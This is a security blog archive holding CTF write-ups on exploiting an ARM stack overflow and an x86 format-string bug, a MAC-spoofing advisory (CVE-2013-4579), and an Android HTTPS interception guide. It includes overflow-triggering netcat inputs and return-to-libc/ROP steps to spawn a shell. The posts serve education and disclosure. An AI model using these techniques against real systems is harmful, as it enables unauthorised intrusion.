Sunday 15 December 2013

Reversing and Exploiting ARM Binaries: rwthCTF Trafman

As ARM is becoming more and more popular, the need to reverse engineer ARM binaries is increasing as well. For example, nearly all mobile phones have at least one ARM processor. In this post I show how to set up a virtual ARM environment using Qemu, give an introduction to ARM assembly (while highlighting the differences with x86), show how to reverse ARM binaries, and finally demonstrate how to write basic exploits for ARM. We will use the trafman challenge of rwthCTF as an example.


Virtual ARM Environment

To start we need an environment capable of running ARM binaries. Since I didn't have an ARM machine I created a virtual ARM environment using Qemu. Qemu is similar to VirtualBox or VMWare, except that it can support multiple architectures. This allows you the emulate ARM on your default x86 or x64 machine.

First we need to know which ARM architecture to pick. Most Linux distributions support two architectures: armel and armhf. Armel supports the ARMv4 instruction set and emulates floating point operations in software, while armhf supports the ARMv7 instruction set and uses hardware floating point operations. At least that's the case for Debian, Ubuntu uses the term "armel" differently [Ubuntu FAQ, ARM FOSDEM]. In this post I will stick to Debian. Though I haven't tested this myself, it should be possible to run armel binaries on an armhf system (this should be true for both Ubuntu and Debian). For completeness, there were also the 'arm' and 'armeb' architectures, but they are no longer supported and don't appear to be used anymore. We will use the armhf architecture, in particular Debian Wheezy armhf.

Unlike x86/PC systems, ARM systems typically don't have a BIOS. This means nothing initializes the hardware, reads the first sector of the disk, or finds where to execute code from. Instead, Qemu allows you to start a system using a "-kernel" option. It loads the given binary into memory at 0x6001000 and uses a kernel calling convention to pass the commandline and the location of initrd [#IO ARM Challenge]. In practice this means we'll always have to start Qemu using a -kernel and -initrd option.

With that background we're ready to install Debian Wheezy armhf using Qemu. First create an empty directory for the virtual environment, create a virtual harddisk for Qemu, and download the appropriate initrd and vmlinux from the Debian FTP:
Note that vexpress stands for the system we will emulate, namely a Versatile Express board. We will emulate it with a cortex-a9 processor, so we pass vexpress-a9 as an argument to Qemu. Now start the installer under Qemu as follows:
  • qemu-system-arm -M vexpress-a9 -kernel vmlinuz-3.2.0-4-vexpress -initrd initrd.gz -append "root=/dev/mmcblk0" -drive if=sd,cache=unsafe,file=hda.img
Follow the instructions. A graphical environment is not required. After the installation we have to extract the installed initrd image, otherwise (if you use the downloaded initrd) the installer will again boot. To mount the virtual filesystem we first have to find the proper offset. Execute "file hda.img". The output should include something like "startsector 2048". The offset is now 512*2048. In case your offset is different than 2048 you will have to update the numbers in the next commands:
  • mkdir mountdir
  • mount -o loop,offset=$((512*2048)) hda.img mountdir/
  • cp mountdir/initrd.img-3.2.0-4-vexpress .
  • umount mountdir/
And now you can boot your virtual ARM environment with:

  • qemu-system-arm -M vexpress-a9 -kernel vmlinuz-3.2.0-4-vexpress -initrd initrd.img-3.2.0-4-vexpress -append "root=/dev/mmcblk0p2" -drive if=sd,cache=unsafe,file=hda.img
You should now have a working Qemu environment.


One warning: Qemu is still an emulator. When testing rare edge cases of exotic ARM instructions (which do not occur much in practice) there's always a chance the emulator is wrong.


Network Interface in Qemu

If the program you want to reverse engineer is a network service, it is convenient to be able to connect to it from your host system. This allows you to use tools on your host system to connect and exploit the binary (while debugging it in the guest system). This is especially convenient if Qemu is slow.

To enable network support we must specify a network device (NIC) that will be emulated. And we must specify the network backend that Qemu should use to interact with the emulated NIC. By default Qemu emulates an Intel e1000 PCI card with a user-mode network stack. User mode networking is great for allowing access to network resources, including the Internet. By default, however, it acts as a firewall and does not permit any incoming traffic. It also doesn't support protocols other than TCP and UDP. For example, ping won't work [WikiBooks].

The first option to allow incoming traffic is port redirection. This allows you to redirect a port on the host OS to a port on the guest OS. For debugging a simple service this is sufficient. As an example, redirecting TCP port 6666 on the host to port 8080 on the guest is done as follows:
qemu-system-arm -M vexpress-a9 -kernel vmlinuz-3.2.0-4-vexpress -initrd initrd.img-3.2.0-4-vexpress -append "root=/dev/mmcblk0p2" -drive if=sd,cache=unsafe,file=hda.img -redir tcp:6666::8080
You can now run a service on port 8080 in the Qemu guest, and connect to it from the host using port 6666. Multiple ports can be redirected. Port redirection can also be used to share folders between the guest and the host [WikiBooks]. The downside is that you cannot dynamically add new redirects once Qemu is running. Additionally, only TCP and UDP are supported.

The second option is to create a TAP interface [Tun/Tap IntroQemuWiki]. It offers very good performance and can be configured to create virtually any type of network topology. This creates a new virtual interface on your host system, and you can use this interface to communicate with the guest. To start Qemu using a TAP interface as network backend, use the following command:
qemu-system-arm -M vexpress-a9 -kernel vmlinuz-3.2.0-4-vexpress -initrd initrd.img-3.2.0-4-vexpress -append "root=/dev/mmcblk0p2" -drive if=sd,cache=unsafe,file=hda.img -net nic -net tap,ifname=qtap0
Unfortunately you will have to manually configure IP addresses (e.g. setup a DHCP server, configure DNS, configure IP forwarding/NAT, etc). I will not go into detail here. If you don't need an internet connection and only need basic communication between the host and guest, execute the following commands in the guest:
  • ip addr add 172.20.0.2/24 dev eth0
  • route add default gw 172.20.0.1 eth0
I prefer port redirection because it's easier to configure and is usually sufficient to get the job done.


Introduction to ARM Assembly

Simplified, an ARM processor can be in two modes: ARM mode and Thumb mode. When the CPU is in ARM mode it executes 32 bit ARM instructions, and when it is in Thumb mode it executes mixed 16- and 32-bit Thumb instructions. The purpose of Thumb mode is to improve code density. How to switch between ARM and Thumb mode will be explained shortly.

In both ARM and Thumb mode we have access to 16 32-bit registers called r0..r15. Special registers are:
  • r12: intra procedure register (ip)
  • r13: stack pointer (sp)
  • r14: link register (lr)
  • r15: program counter (pc)
Register r12 is sometimes used as an Intra Procedure (ip) call scratch register, meaning it holds intermediate values when a subroutine is being called. So if you see the ip register in a disassembly listing, it does not stand for instruction pointer. Finally, subroutines must preserve the contents of r4..r11 and the stack pointer r13. A few short examples:
sub sp, #8        ; sp -= 8  // allocate stack memory
add r7, sp, #0    ; r7 = sp + 0
add r7, #0        ; r7 += 0
str r0, [r7, #4]  ; *(r7 + 4) = r0 // dereference ptr
str r0, [r7, #0]  ; *(r7 + 0) = r0
nop               ; No Operation
movw r0, #33848   ; r0[0:16]  = 0x8438 // move to bottom
movt r0, #1       ; r0[16:32] = 0x1    // move to top
                  ; Now r0 contains 0x18438
Here r7 is used as a frame pointer to access local variables or function arguments. Also note that certain instructions (like add) can have three arguments (unlike the common two arguments in x86). In order to move a 32bit word in a register we need two instructions: one to set the bottom half of the register, and one to set the upper half of the register. This is a consequence of the RISC architecture of ARM: we have simple instructions that execute quickly, but must be more verbose to get stuff done.

What we called jumps in x86 lingo are called branches in ARM. For example "jmp offset" on x86 becomes "b addr" in ARM. Function calls from x86 are also called branches, in particular "call func" from x86 becomes "bl addr" in ARM. Here BL stands for Branch and Link, meaning the program counter r15 is set to addr and the link register r14 is set to the return address. This highlights an important difference with x86: in ARM the return address is not pushed on the stack by the caller. Instead, it it always saved in the link register (lr). The callee is responsible for saving the return address (generally the callee will save it on the stack).

The instructions bxblx, and bjx can be used to switch processor mode from ARM to Thumb (or reverse). There are two use cases: the target is a label or the target is a register [ARM]. In the case the target is a label, the instruction is of the form "blx addr", and the mode is always switched. In case the target is specified using a register, e.g. "blx lr", the mode will be set according to the least significant bit (LSB) of the register. Note that all ARM and Thumb instructions must be 16-bit (two bytes) aligned, thus the least significant bit (LSB) of function addresses is in fact always zero. An even address means the target code is an ARM instruction, an uneven address means it is Thumb code. For example, when the register contains the value 0x8001 the processor will switch to Thumb mode and start executing at 0x8000. The same is true when returning from a function: if the return address is even it will switch to ARM, if it is uneven it will switch to Thumb mode. Returning can be done using "pop {pc}" or "bx lr". Both instructions will set the processor context accordingly. Note that branch instructions without an "X" in them do not change processor mode.

One practical consequence of ARM vs. Thumb addresses is that we often see references to "symbol+1", indicating that the symbol is referring to a function in Thumb mode. Additionally we have to use correct addresses in our exploit: Your debugger might say a function starts at address 0x8000, but if it is a function using Thumb instructions we must actually use the address 0x8001 (depending on context). Finally we note that we can inspect the current mode in gdb by using the "i r cpsr" command. Bit 0x20 will be set if we are in Thumb mode, i.e. Thumb mode is set if (cpsr & 0x20) != 0.

Let's end with the second half of the previous example:
blx 0x82ec      ; branch to 0x82ec (and switch mode)
bl 0x8398       ; branch to 0x8298 (don't switch mode)
add r12, r12, #8, 20     ; r12 = 0x8000
                ; 0x8000 = RotateRight(8, 2*20) [ref]
mov sp, r7      ; set stack pointer to original value
pop {r7, pc}    ; restore r7 and return to caller
The first instruction branches to address 0x82ec and switches the current processor mode, with the return address saved in the lr register. In case we were executing Thumb code this return address will be uneven, otherwise it will be even. The second instruction branches to 0x8398 without switching mode (there is no x in the branch instruction). Hence the function will be executed in the mode the processor is currently in. We also have an interesting add instruction: it adds RotateRight(8, 2*20) to r12 (which is equal to 0x8000). For more background on how this constant is encoded read the ARM documentation.

If you want to understand ARM in more detail, a fun way to learn it is by making an ARM intro challenge. Essentially that means displaying cool graphics using only ARM code. The full background on how to get started is on #IO STS. Perhaps luckily, a detailed understanding is not required to reverse engineer a program and follow this guide.


Reversing the Trafman Challenge

As an example we will reverse engineer the Trafman challenge from rwthCTF (for the binary to work properly you need to create a directory called "db" next to the binary). We open the binary in IDA and see that it failed to disassemble the first instructions:


This is because start is located at the uneven address 0x880D. In other words the binary starts executing in Thumb mode at address 0x880C, but IDA thinks it starts executing at 0x880D. We fix this by selecting address 0x880C, pressing ALT+G, and changing the value to 1 (this tells IDA that Thumb code is located at this address). Now again select address 0x880C and press C to directly convert the section to code.


We see a call which initializes libc. The pointer to the main function is stored in r0. Hence main() is located at address 0x87E0 and is Thumb code. So go to address 0x87E0, press ALT+G, set value to 1, and repeat until all instructions are in Thumb. Now select all the instructions belonging to the main function and press P to create a function of this code block. We have to manually select all the instructions in the function because otherwise IDA fails to create the function for us. Rename the function to main.


With this starting point you can analyze what the binary is doing. Also remember to interact as much as possible with the application before looking at assembler code. In fact, I found one vulnerability by simply entering unusual inputs.

The binary gets its input and output using stdin and stdout, respectively. During the CTF a new executable was spawned for every new connection and its input/output was forwarded. On startup the binary asks for a username. Our first goal is to find a valid username.


We want to locate the code responsible for checking the username. To do this we find where the error message is referenced. So, open the Strings subview and double click on the "ERR Invalid User" string. Now select the name of the string (aErrInvalidUser) and press X to find all references to the string. Only one function is referencing this string, open it. After a little bit of reverse engineering we get the following:


The ASCII string "traffic_operator" is loaded and compared to the string entered by the user. Based on the result of this comparison we either get the error message or are successfully logged in. That solves our first problem: the username is traffic_operator.

Once logged in the user has three options:
  1. Get command: the user enters a file name of exactly 40 alphanumeric characters. If this file was previously added (see next point) its content is loaded and displayed to the user.
  2. Execute command: the user enters a file name of at least 40 alphanumeric characters. It creates a file with as name the 40 first characters and allows to user to write arbitrary content to it.
  3. Exit.
After testing these functions we find a buffer overflow when getting a command (i.e. when reading a file). To trigger the overflow we write a large file using the second option, and then read it using the first option. In my virtual ARM environment I used the following commands to test and trigger the vulnerability:
  • ARM host: nc -c ./trafman -l -p 8000
  • Guest OS: perl -e 'print "traffic_operator\n2\n"."a"x40 ."\n"."A"x400 ."\n1\n"."a"x40 ."\n"' | nc localhost 8000
We will analyze the crash in more detail in the next section. First, we reverse engineer the option menu. It's easy to locate this code because it's contained in the only function that main() calls. So open main and double click on the only non-library function being called. The text-based interface shows only three options. However, when looking at the code, we see there is a hidden option. When entering 23 the address of printf is displayed:


Notice that r0 is set to 0x8FC4 which is a pointer to the ASCII string "> %p". Register r7 is initialized in the beginning of the function to 0x12010. This address contains the dynamically loaded address of printf. Hence, it will tell us where libc is located in memory.


Getting Control of the Program Counter

We know what to do to crash the program. But we don't yet know what is causing the crash, which code is responsible, and whether it's exploitable. To answer these questions we run the binary in a debugger. Executing the following commands allows us to connect to the service from our host OS yet still debug the trafman binary itself:
  • gbc nc
  • set follow-fork-mode child
  • r -c ./trafman -l -p 8000
We now trigger the crash with:
  • perl -e 'print "traffic_operator\n2\n"."a"x40 ."\n"."A"x400 ."\n1\n"."a"x40 ."\n"' | nc localhost 8000
This results in a segmentation fault because it's trying to execute code at 0x41414141. Executing "x/20x $sp" in gdb to dump the stack shows that it's likely a stackoverflow vulnerability. With this alone we know enough to write a functional exploit. But since we're learning ARM we will take a look at the code that is responsible for the buffer overflow. We open the function that is executed when the user selects option 1 in the menu and reverse it.


What happens here is that each byte in the file gets read using fgetc until we are at the end of the file. In every loop the new byte is saved to an array on the stack, which will eventually overflow. The function returns to the caller using a "pop {pc}" instruction. An interesting instruction here is "adds r0, #1". It adds one to the register r0, and updates the status (a.k.a. condition) flags according to the resulting value. In particular, if the result is zero (meaning r0 was -1), the zero flag will be set. Using the BNE instruction we test for the zero flag. If it is set we exit the loop. Note that more instructions can set the status flag this way, and they can be recognized using the S suffix.

So we indeed have a classic buffer overflow (without a stack canary). The return address is saved on the stack and popped on the function exit. Our first step in exploiting the binary is to find out where we have to put the return address in our file (remember that the content of the file is written to the stack and parts of it will overflow the saved return address). To quickly accomplish this we use the pattern_create tool from metasploit. We again start the binary in Qemu as follows (I won't repeat this again):
  • gbc nc
  • set follow-fork-mode child
  • r -c ./trafman -l -p 8000
On our host we execute the following commands:
  • PATRN=$(/usr/share/metasploit-framework/tools/pattern_create.rb 400)
  • perl -e 'print "traffic_operator\n2\n"."a"x40 ."\n"."'$PATRN'" ."\n1\n"."a"x40 ."\n"' | nc localhost 8000
We let pattern_create.rb generate a unique pattern of 400 characters. As an example, a unique pattern of 20 characters would be "Aa0Aa1Aa2Aa3Aa4Aa5Aa". If we now know which bytes in this pattern get loaded in the program counter, we can let pattern_offset.rb calculate the offset where the return address is located in our file. In gdb we see it segfaults with the program counter at 0x41326a40. So we find the offset with the following command:
  • /usr/share/metasploit-framework/tools/pattern_offset.rb 41326a40
This returns 276. So we have to put the return address 276 bytes into the payload. As a quick test, execute the following command:
  • perl -e 'print "traffic_operator\n2\n"."a"x40 ."\n"."A"x276 ."ABCD\n1\n"."a"x40 ."\n"' | nc localhost 8000
This will segfault with the program counter at "ABCD". We now need to point the program counter to code that will get us a shell. Unfortunately the binary uses both ASLR and NX, meaning it uses random addresses, and we can't execute data on the stack and/or heap.


Defeating ASLR and NX

Our goal is a return-to-libc attack. In particular we will attempt to execute system("/bin/sh"). Defeating ASLR is trivial due to the hidden menu option which prints the address of printf. Based on the address of printf we can locate the addresses of other variables and functions within the libc library. To get the address of printf and system for a specific run we execute "p printf" and "p system" in gdb. This gives:
  • system: 0x76f2aa38
  • printf: 0x76f347d4
There is one catch: gdb says these functions are located at an even address. However, the functions are actually Thumb code! So make sure that the correct processor mode is used when executing these functions (if necessary make the addresses uneven). Anyway, the hidden menu option returns an uneven address, hence to get the address of system we take the address of printf and substract 0x9D9C from it.

So we can call system, but still need to pass an argument to it. There are two steps to accomplish this, first we need to find out where in memory the string "/bin/sh" is located, then we need to find a way to put a pointer to this string into register r0 (recall that r0 contains the first argument of a function).

Finding a "/bin/sh" string it easy. Internally the system() function uses it as well, so it's located in the libc library. To quick find it execute the following in gdb:
  • find &system, +99999999, "/bin/sh"
In my particular instance this returned 0x76fc6528. So to dynamically get the address of "/bin/sh" we take the address of printf and add 0x91D53 to it (again remember that the hidden option returns the uneven address). To load this pointer into r0 with NX enabled we will use return-oriented-programming (ROP).

We will use ROP gadgets located in the libc library, because that's the only library we know the addresses of. Within the library we have to find gadgets which set r0 and let us return to the system function. To do this I transferred libc.so.6 to the host and executed:
  • arm-linux-objdump -d libc.so.6 | grep "pop.*r0.*pc"
To install the arm-linux-* tools see IO SmashTheStack. There are likely better tools to find usable gadgets, but this quick and dirty method got the job done. Important is to search for both Thumb and ARM gadgets! Forcing Thumb mode can be done using -Mforce-thumb. The most interesting gadget found was:
  • 5a7bc: pop  {r0, r4, pc}
Remark that this is ARM instruction. In objdump printf is located at 0x387d4. I found this by executing:
  • arm-linux-objdump -d libc.so.6 | grep "printf>:"
So to dynamically get the location of the gadget we take the location of printf and add 0x21FE8 to it. Good, we now have everything in place to trigger the overflow and make it execute system("/bin/sh"). Combining all findings results in the following exploit, where I wrote the nclib myself and its functionality should be self-explanatory. When executing the exploit it looks like this:


DONE. FINALLY! :D

Sunday 10 November 2013

Unmasking a Spoofed MAC Address (CVE-2013-4579)

Update: This vulnerability has been fixed in kernel 3.8.13.16 and above.

Certain Atheros wireless drivers do not properly update the MAC address when changed (spoofed) by a user. This allows an active attacker to retrieve the original MAC address. In short, spoofing your MAC address does not always hide the original MAC address.


Background

While working on the ath9k_htc driver (used by Atheros USB WiFi donglesI noticed the driver did not properly set a spoofed MAC address. Though the device appears to use the newly assigned MAC address correctly, the flaw allows an attacker capable of injecting packets towards the target to uncover the original MAC address.

The cause of the problem lies in how the driver and hardware implement Multiple Virtual Interface (VIF) support. Using this technology a single wireless chip can listen on multiple MAC addresses. Because sending an acknowledgement to correctly received packets is done in hardware, a question that arises is how the wireless chip can quickly determine whether a wireless packet was destined for it. At first you'd think there must be some method to give the hardware a (possibly fixed length) list of MAC addresses to listen on. However, some devices uses a different strategy (and in particular Atheros devices uses this method). Their strategy is the following: the wireless chip has a register which contains the "main" hardware MAC address (mainmac), and a register containing a mask (macmask). Given an incoming frame destined for a particular mac (incmac), it sends an ACK and accepts the frame if and only if: (mainmac & macmask) == (incmac & macmask). You can see that macmask determines which bits of incmask (MAC of the packet being received) have to match those of mainmac. Essentially the macmask represents the locations where the bits of all the virtual MAC addresses are identical to the "main" hardware MAC address (mainmac).

To clarify, consider a device having two virtual interfaces, one with MAC address 72:40:a2:3f:65:5a and another one with address 8e:8e:95:cd:90:4e. In binary these MAC addresses are:
01110010 : 01000000 : 10100010 : 00111111 : 01100101 : 01011010
10001110 : 10001110 : 10010101 : 11001101 : 10010000 : 01001110
Now, macmask should consist of the bits where both these MAC addresses are the same (mathematically that's the negation of the XOR). In our example the mask would be:
00000011 : 00110001 : 11001000 : 00001101 : 00001010 : 11101011
So the wireless chip can pick either 72:40:a2:3f:65:5a or 8e:8e:95:cd:90:4e as its main MAC address, and then set the mask to 03:31:c8:0d:0a:eb. Frames sent to either of these MAC addresses will now be accepted and acknowledged. For more details see the comments in the atheros driver source file. Unfortunately this technique has the side effect that the wireless chipset now listens on more MAC addresses then we really want, as not all bits of incoming frames are checked!

Vulnerability Details

When a MAC address is spoofed the driver does not simply update the mainmac register. Instead the mainmac register will still contain the original MAC address, and macmask will contain the bits where the original and spoofed MAC agree (see previous section). The wireless chip will acknowledge frames sent to the spoofed MAC addresses, and the operating system will include the spoofed MAC address in all packets, so everything will seem to work properly. Unfortunately this method allows an attacker to uncover the original MAC address bit by bit (given the spoofed MAC address). Specifically we can determine the value of any bit of the original MAC address as follows:
  1. Flip the bit in the spoofed MAC address and send a packet to the modified MAC address.
  2. We now have two cases:
    • The device replies with an ACK: This means the mask for this bit is zero, thus the bit in the spoofed MAC address was different than the original MAC address.
    • Device doesn't reply: This means the mask for this bit is one, so the bit we are guessing was identical to the bit in the spoofed MAC
By doing this for each bit, we eventually learn the complete original MAC address.

The vulnerability has been successfully exploited against AR7010 and AR9271 chipsets (which use the ath9k_htc driver) under following operating systems:
  • Debian 7.2.0 amd64 and i386
  • Kali 1.0.5 amd64 and i386
  • Ubuntu 13.10 amd64 and i386
The ath9k driver is not vulnerable (see comments below). The ath5k and ath10k were not tested and/or investigated. Other drivers also capable of creating multiple virtual interfaces with different MAC addresses, on a single device, might also be susceptible to the same vulnerability (so feel free test your device and post results).

Exploit

A proof of concept has been implemented in python using scapy. Given a MAC address that you suspect to be spoofed the tool will attempt to uncover the original MAC address. In case the tool returns the same MAC address as you entered, it means the target is not susceptible to the attack, or that the target is using the default MAC address of the device.

Patch

Update: I have made a patch and submitted it to the linux-wireless@vger.kernel.org mailing list (before this patch I also notified the ath9k-devel mailing list of the bug and filed a bug report for debian). The CVE ID of this bug is CVE-2013-4579.

Final Remarks

Though spoofing a MAC address can be done securely by simply updating mainmac, an attacker can use the same technique to learn that two virtual MAC addresses actually belong to the same user. So if you put up several virtual interfaces (possibly with random MAC addresses) they can be easily linked back together (again, that's if your device uses a method similar to the one described above). This flaw is inherent to usage of macmask and, at first sight, seems difficult to fix.

Sunday 16 June 2013

Transparent Interception of Android HTTPS Traffic

Smoothly intercepting HTTPS traffic of the Android emulator can be a pain in the ass. In particular when you're using a proxy such as Burp, you might not even know that some connections are not being intercepted. During a pentest this is something you absolutely want to avoid. That's why I created a small script to see all the connections the emulator is trying to make (including those that are not shown by your normal proxy).

Preparing Test Environment

It's handy to have a small script which initializes the PATH variable for easy access to all your tools. I use a setenvironment.bat file with the following commands:
@ECHO OFF
SET PATH=%PATH%;C:\Program Files\Java\jdk1.7.0_01\bin
SET PATH=%PATH%;C:\Program Files (x86)\Android\android-sdk\platform-tools
SET PATH=%PATH%;C:\Program Files (x86)\Android\android-sdk\tools
SET PATH=%PATH%;C:\Python27
SET PATH=%PATH%;C:\Mobile-Tools
ECHO === Environment for Andriod Pentesting has been set ===
Modify the paths to match your own environment. You don't have to use that to follow this post, as long as you can execute the command. We begin by starting the emulator1 2 and installing the application we want to test:
emulator @Android4
adb install WhatsApp.apk
Our goal will be to intercept and manipulate the traffic of WhatsApp using Burp.

Adding Burp CA Certificate

First we have to add the CA certificate of Burp as a trusted CA. In this post we will focus on the Burp proxy, though this guide is applicable to other proxy's as well. First we configure Burp to generate CA-signed per-host certificates. In Proxy Listeners select the appropriate entry and click on edit:


Burp now acts as a Certificate Authority (CA) and automatically generates certificates for any domain. We will have the add the Burp CA as a trusted certificate authority on Android. First we need to obtain the public key of the Burp CA. For this we configure firefox to use Burp as a proxy and navigate to a HTTPS website. Now do the following and make sure "PortswiggerCA " is selected in the Certificate Hierarchy:


Save the certificate as PortSwiggerCA.crt and copy it over to the SD card of the emulator:
adb push PortSwiggerCA.crt /sdcard/PortSwiggerCA.crt
In the emulator go to settings, security and then Install from SD card. You will have to set a lock screen PIN in order to add it. This should do the trick! Now run the emulator using the proxy execute:
emulator @Android4 -http-proxy http://localhost:8080
Unfortunately this doesn't work properly. If you visit HTTPS websites it will still complain that an invalid certificate is being used. But there's a simple fix for that :)

Certificate Problems

The reason why the certificates generated by Burp aren't accepted by Android is because they aren't valid yet (at least according to Android). When Burp generates a certificate it marks that it's valid starting precisely this second. Unfortunately Android then thinks the certificate isn't valid yet. This can easily be solved by setting the date of the Android emulator 1 day in the future.

AndroidProxy: Avoiding Additional Certificate Problems

There is an additional annoyance: Burp doesn't show the hostname of the requested site, it shows the IP address. This is quite annoying when viewing the history of all requests made:


When using Burp this is merely an annoyance. But when using a less powerfull proxy this can be a real problem! Behind the scenes the emulator acts as an invisible proxy for all HTTP(S) traffic, forwarding all request to your proxy. The problem is that these requests are of the form "CONNECT <IP>:443". As a result your proxy doesn't know the domain you are requesting. In turn your proxy potentially generates a certificate with as common name the IP address of the server. Unfortunately this will cause an error:


The latest version of Burp solves this by first looking up the hostname corresponding to that IP. But if your proxy doesn't have that capability you have a problem. And we still want a clean history screen in Burp, with the domain names being shown properly. So what we need is something that sits between Android and your actual proxy which rewrites the "CONNECT <ip>" request to "CONNECT <doman>".

To solve this problem I created AndroidProxy. It intercepting all DNS requests and rewrites the "CONNECT <ip>" command to "CONNECT <domain>" before it reaches your proxy. Normal HTTP traffic is left untouched. By intercepting all DNS request a unique IP address can be associated with each domain (even if in reality the domains have the same IP). When an IP address is encountered in a CONNECT method we can lookup the unique IP address and find the corresponding domain name. This process is illustrated below:


Another essential advantage is that AndroidProxy prints all the connection that the device is trying to make. This is important, because some proxy's (such as Burp) don't warn you about HTTPS connections that fail. They silently drop them, and you'll never know a connection was attempted.

You can start AndroidProxy using the following steps:
  1. Start your normal proxy (eg. Burp) listening on port 8080.
  2. Start AndroidProxy: python main.py
  3. Run the emulator: emulator @Avd -http-proxy http://localhost:8007 -dns-server localhost
  4. Remember to change the date of the Android emulator to 1 day in the future!
Future Work

The current setup is not perfect. There are several elements which could be improved:
  1. Find a (cross platform) GUI tool to intercept arbitrary SSL connections (not just HTTPS). TcpCatcher could be a candidiate, unfortunately I was unable to install the CA of TcpCatcher on Android (because the CA certificate was an old version?).
  2. Preferably your normal proxy just does a raw dump of the intercepted SSL connections, even though it's not HTTP. One would need to update Burp to accomplish this.
  3. Or we can extend the AndroidProxy itself to intercept SSL, and write a cross platform GUI on top to easily display individual connections.
I only plan to maintain AndroidProxy, and likely won't be adding new features. Feel free to fork it.

Footnotes
  1. Remember to install Intel HAXM when using the x86 emulator image [More Info]. If not present you get the error "emulator: Open HAX device failed". Download it from the SDK Manager, then go to android-sdk\extras\intel\Hardware_Accelerated_Execution_Manager and launch the installer.
  2. If you get the error "Failed to allocate memory: 8" make sure the emulator gets at most 512MB of memory. For some reason it doesn't start properly when using more memory [More Info].

Saturday 6 April 2013

UCSB iCTF: Hacking Nuclear Plants and Pwning ASLR/NX

The following story took place on a Friday evening, with the sun long gone from the horizon, in a dimly lit room where a few hackers teamed up to do what they do best: fuck shit up.

A former security researcher at KU Leuven took his fifth coffee this hour. Or was it the sixth? He didn't care. Today there was only one thing on his mind: breaking into the nuclear power plants of those Cyberdyne sons o' bitches. It seemed easy enough at first sight. Even his ex-colleague, whom not always had the brightest moments, was able to connect to the power plants using netcat. A nice little menu greeted us:


Our hackers were already familiar with the menu. New nuclear plants could be added and existing ones could be listed. Even the configuration of each power plant, which consists of the number of elements present in the power plant, could easily be updated. And last but not least there were the options to get and set a self-destruct code. This self-destruct code was of course the flag they were after - the reason they were already awake for 16 hours. Unfortunately the self-destruction code can only be accessed if you know a rather lengthy password. But rest assured that such pity defences don't stop true hackers.

By bribing the right people they managed to obtain the binary code responsible for displaying the menu. With this information in hands, it didn't take them long to find the first weak spot in the Cyberdyne system: a format string vulnerability [1]. After a plant is created, or after editing an existing nuclear plant, the amount of uranium was checked by the following function:


The code above was generated by IDA Pro and the Hex-Rays Decompiler, both state of the art tools used by the bad and the good guys. For our hackers it was clear: if the level of uranium is equal or lower to zero, a format string vulnerability is triggered (line 10), potentially enabling them to take over the system. Using the control panel it wasn't possible to edit the plant such that it had a non-positive uranium level, so it wasn't clear how they could force the system to execute this code. But a quick look at the code responsible for adding a new power plant changed the situation:


After staring at this code and getting another coffee, it all became clear. At least for now. Our hackers eagerly discussed it with each other in precise detail: The code first calls get_random_num a few times to initialize the levels of all elements present in the power plant (oxygen, carbon, boron, zirconium and uranium). Uranium is one of those elements. Then the name that has been given to the new power plant (line 6) is copied to the memory region containing all information about the power plant (line 13). This memory region begins with the name of the plant, and ends with the levels of each element. However the string copy function possibly overwrites the levels of each element! This is because all information about a plant is saved in only 112 bytes (see line 4), and the string copy function copies at most 0x70 bytes (line 6). Recall that 0x70 is the hexadecimal representation of 112, meaning the name of the plant potentially overwrites all the other information in the memory region.

After the plant name is copied, the function check_secondary_elems_level checks that the levels of the secondary elements (oxygen, carbon, boron and zirconium) are between, and including, 1 and 999. Our hackers concluded that entering a long name will overwrite the levels of each elements, and if done properly will assure that the vulnerable printf statement gets executed. In other words the vulnerability has been confirmed, and it's time to use it to destroy those Cyberdyne scums.

A Second Entry Point

Amazingly the not-so-bright ex-colleague found another vulnerability in the code. Looking again at the code to add a power plant, and this time focussing on where the data is saved, we get the following:


He saw that there are no checks whether there still is enough memory left when adding a new power plant! The plantid variable, which is used to determine where in memory to save the next plan, is always increased by one without checking whether there's actually space left. Argument a1 is pointing to the memory where the information will be stored and is allocated on the stack by the calling function. Essentially all nuclear plants are stored in one big "list" on the stack, and eventually there won't be enough space to save them all, making the stack go BOOM. And when the stack goes boom, the hackers gain control. Unfortunately it took our colleague a while to find this, and in the end this vulnerability wasn't used. We all smiled though: typical Cyberdyne, they always make more than one mistake.

For hackers the backdoor is always open.
"....that's what she said!"

Bypassing ASLR and NX

Cyberdyne knew the power plant software was not to be trusted. To remedy this they hired some of the best security researchers around the world to create some defences. Unfortunately Cyberdyne was too incompetent to actually implement them, making them ditch all the excellent research. Instead they settled for two other (already well known) protection mechanisms: ASLR and NX

One of the older hackers of the group was reminiscing about exploits and vulnerabilities back in the good old days. The days where all programs, even the operating system, lived in the same memory region. Ah, it was just too easy to exploit programs then. He also recalled how information leakage vulnerabilities were considered useless. These are vulnerabilities that don't let you take over a system, but only make the system reveal some information, like where certain data is stored. The problem is that even though you know where certain data was stored, you can't necessarily read it, making people ignore these attacks. But it was clear to him that such information leakage attacks would be essential to bypass ASLR and eventually attack Cyberdyne.

The older hacker begins his explanation to the youngers ones: The format string exploit can be used as an information leakage attack to defeat ASLR. When using %10$p%11$p as a plant name it will display the saved frame pointer (ebp) followed by the return address (eip). Remark that the plant name must be followed by data so the appropriate number of elements will be overwritten in order to reach the vulnerable printf call. Though the binary isn't position independent, and hence can't fully benefit from ASLR, this information leakage defeats ASLR. The absolute position of libraries can be derived from the pointers in the .GOT section, defeating ASLR for loaded libraries as well. More precisely, the first 4 bytes of the plant name will contain a pointer to the .GOT entry of fork() followed by the string %22$s. This will print out the string located at the .GOT entry of fork() and hence prints out the address of fork (assuming there are no zeros in the address)! Finally, the address of execve() can be found by adding a predictable offset to that of fork(). This teaches us all the addresses we will need when constructing an exploit. The eyes of the other hackers opened wide open - he's right! Even with ASLR we can take this fucker down!

Bypassing protections like a boss.

The second protection mechanism to defat is NX: the stack and heap of the binary are not executable, meaning we can't copy over shellcode and execute it. One of the hackers suggested using a return-oriented programming approach. Quickly they all agreed on this, but simplified the idea to an easier to execute return-to-libc attack. To accomplish this feat they have to control the value of the stack pointer (esp) before executing a return instruction. This can be done by overwriting the saved frame pointer used in the prologue and epilogue of a function. Let's look at the disassembled code of printf to better understand what our hackers are going to do:


Here the register ebp is used to contain the frame pointer, and its value is saved on the stack at the start of the function and restored at the end of the function. Using the format string exploit we can overwrite the saved ebp value, and hence we can control the value of ebp at the end of the printf function. This is done using traditional format string exploits and the %hn format specifier. However, we need to control esp and not ebp! Patience. Let's look at the disassembled code of check_uranium_level:


